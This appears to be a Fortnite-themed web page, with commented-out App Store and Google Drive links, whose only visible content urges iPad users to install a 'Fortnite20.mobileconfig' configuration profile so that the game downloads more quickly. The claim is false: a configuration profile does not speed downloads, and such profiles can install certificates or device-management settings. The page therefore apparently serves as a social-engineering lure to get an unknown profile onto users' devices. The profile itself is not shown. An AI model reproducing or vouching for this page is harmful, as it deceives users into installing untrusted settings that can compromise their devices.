<html>
<head>
<link rel="shortcut icon" type="image/vnd.microsoft.icon" href="favicon.ico">
<link rel="apple-touch-icon" type="image/png" href="logo.png"><!-- iPhone -->
<link rel="apple-touch-icon" type="image/png" sizes="72x72" href="logo.png"><!-- iPad -->
<link rel="apple-touch-icon" type="image/png" sizes="114x114" href="logo.png"><!-- iPhone4 -->
<link rel="icon" type="image/png" href="icon.png">
</head>
<body><!--
  <button onclick="window.location.replace('https://itunes.apple.com/app/fortnite-invite-event/id1261357853?ls=1&mt=8');">Get Fortnite!</button><br><br>
  --><br>Install this <!--<a href="https://drive.google.com/uc?id=1abEd2ovRt650YWd1RKo7j4IsyoIJuKNh&export=download" target="_blank">Configuration Profile</a>--><a href="Fortnite20.mobileconfig" download>Configuration Profile</a> on your iPad to download quicker.
  <br><br><!-- 
  <button onclick="window.location.href='com.epicgames.launcher://apps/fortnite?action=launch&slient=true'">PLAY FORTNITE (if installed])!!!</button>
  --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-125792117-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-125792117-2');
</script>
</html>
<!-- Global site tag (gtag.js) - Google Analyti
